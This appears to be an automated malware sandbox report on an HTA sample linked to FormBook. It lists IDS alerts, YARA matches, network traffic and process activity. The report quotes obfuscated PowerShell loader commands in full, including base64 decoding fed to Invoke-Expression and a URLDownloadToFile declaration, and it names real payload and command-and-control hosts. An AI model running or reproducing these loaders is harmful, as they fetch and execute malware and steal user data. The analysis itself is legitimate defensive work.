                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", CommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgI

                      Data Obfuscation

                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6772, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline", ProcessId: 6884, ProcessName: csc.exe
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
| --- | --- | --- | --- | --- | --- | --- | --- | --- |
| 2024-12-04T13:08:11.192706+0100 | 2057635 | 1 | A Network Trojan was detected | 107.172.44.175 | 80 | 192.168.2.8 | 49709 | TCP |
| 2024-12-04T13:08:31.061460+0100 | 2049038 | 1 | A Network Trojan was detected | 151.101.129.137 | 443 | 192.168.2.8 | 49705 | TCP |
| 2024-12-04T13:09:38.120623+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49723 | 172.67.150.211 | 80 | TCP |
| 2024-12-04T13:10:02.988867+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49783 | 172.67.128.109 | 80 | TCP |
| 2024-12-04T13:10:18.203664+0100 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.8 | 49822 | 199.59.243.227 | 80 | TCP |
| 2024-12-04T13:09:54.892305+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49764 | 172.67.128.109 | 80 | TCP |
| 2024-12-04T13:09:57.553460+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49771 | 172.67.128.109 | 80 | TCP |
| 2024-12-04T13:10:00.253464+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49777 | 172.67.128.109 | 80 | TCP |
| 2024-12-04T13:10:10.198968+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49800 | 199.59.243.227 | 80 | TCP |
| 2024-12-04T13:10:12.872968+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49810 | 199.59.243.227 | 80 | TCP |
| 2024-12-04T13:10:15.529013+0100 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.8 | 49816 | 199.59.243.227 | 80 | TCP |
| 2024-12-04T13:08:11.192706+0100 | 2858295 | 1 | A Network Trojan was detected | 107.172.44.175 | 80 | 192.168.2.8 | 49709 | TCP |

                      AV Detection

Source: http://107.172.44.175/244/RFGDF.txt, Avira URL Cloud: Label: malware
Source: bestimylover.hta, ReversingLabs: Detection: 18%
Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

                      Phishing

Source: Yara match, File source: bestimylover.hta, type: SAMPLE
Source: unknown, HTTPS traffic detected: 151.101.129.137:443 -> 192.168.2.8:49705 version: TLS 1.2
                      Source: Binary string: msinfo32.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: HDLzkMKGEKBh.exe, 0000000F.00000000.2024666715.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184131262.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2125962158.0000000001750000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, msinfo32.exe, 00000010.00000003.2105655055.0000000004AB8000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004FAE000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2658456540.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2117925702.0000000004C67000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: aspnet_compiler.pdb source: msinfo32.exe, 00000010.00000002.2659047347.000000000543C000.00000004.10000000.00040000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003010000.00000004.00000020.00020000.00000000.sdmp, HDLzkMKGEKBh.exe, 00000011.00000000.2184403066.000000000282C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000013.00000002.2412286934.00000000094AC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000008.00000002.1784118376.0000000007490000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000008.00000002.1786164092.00000000079BA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msinfo32.pdbGCTL source: HDLzkMKGEKBh.exe, 0000000F.00000003.2039275924.0000000000D84000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: q8C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.pdb source: powershell.exe, 00000003.00000002.1544480434.0000000005148000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\SysWOW64\msinfo32.exe, Code function: 16_2_02EBCAB0 FindFirstFileW,FindNextFileW,FindClose

                      Software Vulnerabilities

                      Source: C:\Windows\SysWOW64\wscript.exe, Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\msinfo32.exe, Code function: 4x nop then xor eax, eax (16_2_02EA9E90)
                      Source: C:\Windows\SysWOW64\msinfo32.exe, Code function: 4x nop then mov ebx, 00000004h (16_2_04D104F8)

                      Networking

                      Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49723 -> 172.67.150.211:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49771 -> 172.67.128.109:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49764 -> 172.67.128.109:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49777 -> 172.67.128.109:80
                      Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49783 -> 172.67.128.109:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49800 -> 199.59.243.227:80
                      Source: Network traffic, Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49822 -> 199.59.243.227:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49810 -> 199.59.243.227:80
                      Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49816 -> 199.59.243.227:80
                      Source: Network traffic, Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 107.172.44.175:80 -> 192.168.2.8:49709
                      Source: Network traffic, Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 107.172.44.175:80 -> 192.168.2.8:49709
                      Source: Network traffic, Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 151.101.129.137:443 -> 192.168.2.8:49705
                      Source: global traffic, HTTP traffic detected:
                          GET /dytflt61n/image/upload/v1733134947/bklpyseyeut4impw50n1.jpg HTTP/1.1
                          Host: res.cloudinary.com
                          Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected:
                          GET /244/RFGDF.txt HTTP/1.1
                          Host: 107.172.44.175
                          Connection: Keep-Alive
                      Source: Joe Sandbox View, IP Address: 151.101.129.137
                      Source: Joe Sandbox View, IP Address: 107.172.44.175
                      Source: Joe Sandbox View, IP Address: 199.59.243.227
                      Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
                      Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknown, TCP traffic detected without corresponding DNS query: 107.172.44.175
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 3_2_032F7A18 URLDownloadToFileW
                      Source: global traffic, HTTP traffic detected:
                          GET /244/nightridingisreallyniceforworkingskillentiretimefornew.tiFF HTTP/1.1
                          Accept: */*
                          Accept-Encoding: gzip, deflate
                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                          Host: 107.172.44.175
                          Connection: Keep-Alive
                      Source: global traffic, HTTP traffic detected:
                          GET /r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== HTTP/1.1
                          Host: www.enoughmoney.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en;q=0.9
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global traffic, HTTP traffic detected:
                          GET /wl1d/?CJE8V=XvUXHicd9bu/Gt5jzcf/yfRZ+nBfc8WBaOJ84C+StjmOhsjVLRYh1E2iBn46Z6pXP/d+KNfO4kCSPH2wqnfuXKL7xm74uEd7QDGj+trIsQHnhWbGvacQ1+C6F6CbLlCz6w==&-DiH=2XvD5 HTTP/1.1
                          Host: www.cifasnc.info
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en;q=0.9
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global traffic, HTTP traffic detected:
                          GET /9p84/?CJE8V=sVrHaezIocwvk586NbKL/ZmiafOvpGHuxCd8uk51gcnLQEXEQAeULabxZfXafDaZqd/22GpcW/h9erqwiYl6Kq4oLeU8CyaDpPEVNRKQpnjvGs8eQi8Qsuigmn/6Gj17jw==&-DiH=2XvD5 HTTP/1.1
                          Host: www.sql.dance
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en;q=0.9
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global traffic, DNS traffic detected: DNS query: res.cloudinary.com
                      Source: global traffic, DNS traffic detected: DNS query: www.enoughmoney.online
                      Source: global traffic, DNS traffic detected: DNS query: www.cifasnc.info
                      Source: global traffic, DNS traffic detected: DNS query: www.sql.dance
                      Source: unknown, HTTP traffic detected:
                          POST /wl1d/ HTTP/1.1
                          Host: www.cifasnc.info
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                          Accept-Language: en-US,en;q=0.9
                          Accept-Encoding: gzip, deflate, br
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 206
                          Origin: http://www.cifasnc.info
                          Referer: http://www.cifasnc.info/wl1d/
                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                      Source: global traffic, HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Date: Wed, 04 Dec 2024 12:09:37 GMT
                          Content-Type: text/html; charset=iso-8859-1
                          Transfer-Encoding: chunked
                          Connection: close
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=742%2BUAINZjpdBsEaKOwC38Krv1ju7ChPcM%2FbqPxqYltx0Pl2MPNqZnPUS7JTm13qVyagMZorfFpJXpP4Y3FzWAvTeSKPHrDtvjEBMTzzTYcmZQxxX6QhwSES2LGX30oY%2FR7SjZuNKL3B"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8ecbb049f9b38c7d-EWR
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic, HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Date: Wed, 04 Dec 2024 12:09:54 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          x-pingback: http://cifasnc.info/xmlrpc.php
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          last-modified: Wed, 04 Dec 2024 12:09:54 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          pragma: no-cache
                          vary: Accept-Encoding,User-Agent
                          x-turbo-charged-by: LiteSpeed
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDegcyNPwz2ldTWYw8mBg1LChIHHwPUCoxwu31J22yKj59akTIGXZzJAbUOEER41dCLBaPAsqHwN2YHAv3j7qqgMeNbYAfPO%2FChkf3QAMvsve9TtxSen7N0nbwyqrBbtNwRv"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8ecbb0b4486ec342-EWR
                          Content-Encoding: gzip
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic, HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Date: Wed, 04 Dec 2024 12:09:57 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          x-pingback: http://cifasnc.info/xmlrpc.php
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          last-modified: Wed, 04 Dec 2024 12:09:57 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          pragma: no-cache
                          vary: Accept-Encoding,User-Agent
                          x-turbo-charged-by: LiteSpeed
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wswr4lfsK7wYm1A%2BeG5PG0E9oWtyUFDue%2FOaVZV3AbXUHy9KfC35pTCP2Vc3aaTmhSAmMg2d1zJaBNjjQnQgyPkuC8UitQtnSg%2B14Qj8Tcr5ChsVW8ycqFDwTmPnUcraw4KG"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8ecbb0c4fc367c82-EWR
                          Content-Encoding: gzip
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1908&min_rtt=1908&rtt_var=954&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic, HTTP traffic detected:
                          HTTP/1.1 404 Not Found
                          Date: Wed, 04 Dec 2024 12:10:00 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: close
                          x-pingback: http://cifasnc.info/xmlrpc.php
                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                          last-modified: Wed, 04 Dec 2024 12:10:00 GMT
                          cache-control: no-cache, must-revalidate, max-age=0
                          pragma: no-cache
                          vary: Accept-Encoding,User-Agent
                          x-turbo-charged-by: LiteSpeed
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I2EAyYF26HOQOXyLZrJaXL%2BO0itnYrPq0Pm8olJjXXIBWaGdnjFau%2BtdSo48j%2B4BXqKYiU%2B9Ukd2ueXNJd0lq2J3dggC4o1b53gE%2B8NPIwrrsgqdp3kcr8djVmMOJ6iqstFV"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8ecbb0d58bf6efa3-EWR
                          Content-Encoding: gzip
                          alt-svc: h3=":443"; ma=86400
                          server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1959&rtt_var=979&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1788&delivery_rate=0&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknown HTTPS traffic detected: 151.101.129.137:443 -> 192.168.2.8:49705 version: TLS 1.2

                      E-Banking Fraud

                      Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000010.00000002.2658176307.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2122879253.00000000015E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2105673675.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2658252130.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000010.00000002.2655932579.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000C.00000002.2138725831.00000000025A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 0000000F.00000002.2658015654.00000000035E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0042CCE3 NtClose,12_2_0042CCE3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040AB7F NtResumeThread,12_2_0040AB7F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C35C0 NtCreateMutant,LdrInitializeThunk,12_2_017C35C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2B60 NtClose,LdrInitializeThunk,12_2_017C2B60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_017C2DF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_017C2C70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3010 NtOpenDirectoryObject,12_2_017C3010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3090 NtSetValueKey,12_2_017C3090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C4340 NtSetContextThread,12_2_017C4340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C4650 NtSuspendThread,12_2_017C4650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C39B0 NtGetContextThread,12_2_017C39B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BF0 NtAllocateVirtualMemory,12_2_017C2BF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BE0 NtQueryValueKey,12_2_017C2BE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2BA0 NtEnumerateValueKey,12_2_017C2BA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2B80 NtQueryInformationFile,12_2_017C2B80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AF0 NtWriteFile,12_2_017C2AF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AD0 NtReadFile,12_2_017C2AD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2AB0 NtWaitForSingleObject,12_2_017C2AB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3D70 NtOpenThread,12_2_017C3D70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D30 NtUnmapViewOfSection,12_2_017C2D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D10 NtMapViewOfSection,12_2_017C2D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C3D10 NtOpenProcessToken,12_2_017C3D10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2D00 NtSetInformationFile,12_2_017C2D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DD0 NtDelayExecution,12_2_017C2DD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2DB0 NtEnumerateKey,12_2_017C2DB0
